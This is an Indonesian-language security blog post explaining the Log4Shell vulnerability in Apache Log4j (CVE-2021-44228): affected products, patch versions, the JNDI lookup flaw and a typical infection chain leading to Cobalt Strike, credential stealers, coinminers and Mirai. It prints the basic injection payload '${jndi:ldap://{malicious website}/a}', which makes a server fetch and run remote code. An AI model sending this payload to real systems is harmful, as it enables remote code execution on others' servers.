Kerentanan Log4j Atau Log4Shell Dieksploitasi Secara Aktif

Log4Shell, juga dikenal sebagai CVE-2021-44228, pertama kali dilaporkan ke Apache pada 24 November dan ditambal pada 9 Desember.

Kerentanan di Apache Log4j, paket logging yang banyak digunakan untuk Java telah ditemukan dan di exploitasi secara aktif. Kerentanan yang memungkinkan penyerang dapat mengeksekusi kode arbitrer dengan mengirimkan pesan log yang dibuat, telah diidentifikasi sebagai (CVE-2021-44228) dan diberi nama Log4Shell. Ini pertama kali dilaporkan ke Apache pada 24 November dan ditambal dengan Versi 2.15.0 dari Log4j pada 9 Desember. Ini memengaruhi Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, dan VMware vCenter. Sejak itu, telah diungkapkan bahwa dalam kondisi non-default tertentu, tambalan asli tidak lengkap; ini ditetapkan sebagai (CVE-2021-45046) dan Versi baru Log4j, 2.16.0, telah dirilis.

Untuk mengetahui apakah server anda rentan terhadap exploitasi log4j atau tidak, anda dapat melakukan tester pada server melalui website ini (Log4j -Vulnerability Tester). Alat berbasis web ini dapat membantu anda untuk mengidentifikasi server dari kerentanan Log4j.

Dimanapun ${some_expression} dapat ditemukan, mekanisme pencarian Java menemukan nilai ekspresi dan menggantinya. Beberapa pencarian yang didukung oleh Log4j adalah jndi, sys, env, java, lower, dan upper. Pencarian JNDI mendukung protokol seperti LDAP, RMI, DNS, dan IIOP. Seperti yang kita bahas berikut ini, penyerang bisa menyuntikkan ekspresi JNDI di log.

Misalnya, penyerang dapat melakukan ini melalui permintaan HTTP ke server web; khususnya, ini adalah vektor serangan paling umum yang kita lihat saat ini. The lookup Metode kemudian akan mendownload dan menjalankan malicious.class ditempatkan di server LDAP dikendalikan. Dalam bentuknya yang paling dasar, yang harus dilakukan penyerang adalah menanam ekspresi berikut di log:

${jndi:ldap://{malicious website}/a}

Ini kemudian akan menjalankan kode Java berbahaya yang terletak di http://{malicious website}/{malicious.class}.

Rantai infeksi

Berikut ini adalah gambar dari aliran infeksi serangan yang mungkin mengeksploitasi Log4Shell:

Akses awal

Kerentanan ini disebabkan oleh mekanisme "pencarian" di log4j 2.x. Saat memanggil metode log dalam aplikasi, log4j 2.x akan memanggil metode format untuk memeriksa karakter tertentu ${ di setiap log. Jika karakter ini ada, fungsi "pencarian" akan dipanggil untuk menemukan string setelah ${ dan string tersebut diganti dengan nilai sebenarnya yang ditemukan sebelumnya. Telah diamati bahwa ada berbagai bentuk pencarian, seperti pencarian Java Naming Directory Interface (JNDI), yang memungkinkan variabel untuk diambil oleh JNDI.

Beberapa protokol pencarian JNDI didukung untuk memungkinkan pencarian jarak jauh seperti LDAP dan RMI. Jika log berisi string ${jndi:logging/context-name}, pencarian metode akan dipanggil untuk menemukan string jndi:logging/context-name.

Penyerang kemudian dapat menetapkan kelas Java berbahaya pada server LDAP yang dikendalikan penyerang. Pada saat itu, fungsi "pencarian" akan digunakan untuk mengeksekusi kelas jahat di server LDAP jarak jauh.

Eksekusi

Setelah eksploitasi berhasil, tergantung pada konten URL dalam pencarian, server kemudian menginterpretasikan string tersebut. Ini kemudian dapat menyebabkan perintah shell arbitrer dalam berbagai bentuk seperti Java Class, JavaScript, dan Unix shell, antara lain.

Gerakan lateral

Komponen Cobeacon, yang dapat digunakan untuk gerakan lateral, juga terlihat diunduh. Ini juga dapat digunakan untuk gerakan lateral dan kemudian dapat menyebabkan kemungkinan infeksi ransomware, karena komponen Cobeacon telah diamati dalam berbagai serangan ransomware.

Akses kredensial

Kerentanan juga dapat menyebabkan pengunduhan malware dengan kemampuan mencuri kredensial, seperti Kirabash.

Dampak

Pembajakan sumber daya. Coinminers akan menggunakan sumber daya untuk menambang cryptocurrency, sementara Mirai mungkin menggunakan sistem yang terpengaruh sebagai bagian dari botnetnya untuk aktivitas seperti penolakan layanan terdistribusi (DDoS) atau spam.

Penolakan layanan jaringan (DoS). Mirai dapat menggunakan sistem yang terpengaruh untuk meluncurkan serangan DDoS/DoS sebagai bagian dari rutinitasnya.

Pembelian

Kerentanan Log4j Atau Log4Shell Dieksploitasi Secara Aktif
Rp. 20rb / $2
*Pembelian dapat melalui Gopay, OVO dan lainnya detail info

Metode pembayaran

Bank Transfer Paypal
sudah membayar? konfirmasi di sini
IT Security, content creator, menulis di blogger sejak tiga tahun yang lalu.

Posting Komentar

Tinggalkan komentar sesuai topik tulisan, centang Notify me untuk mendapatkan notifikasi via email ketika komentar kamu di balas.
Masukkan URL Gambar atau Potongan Kode, atau Quote, lalu klik tombol yang kamu inginkan untuk di-parse. Salin hasil parse lalu paste ke kolom komentar.


image quote pre code
© subangXploits. All rights reserved. Premium By Raushan Design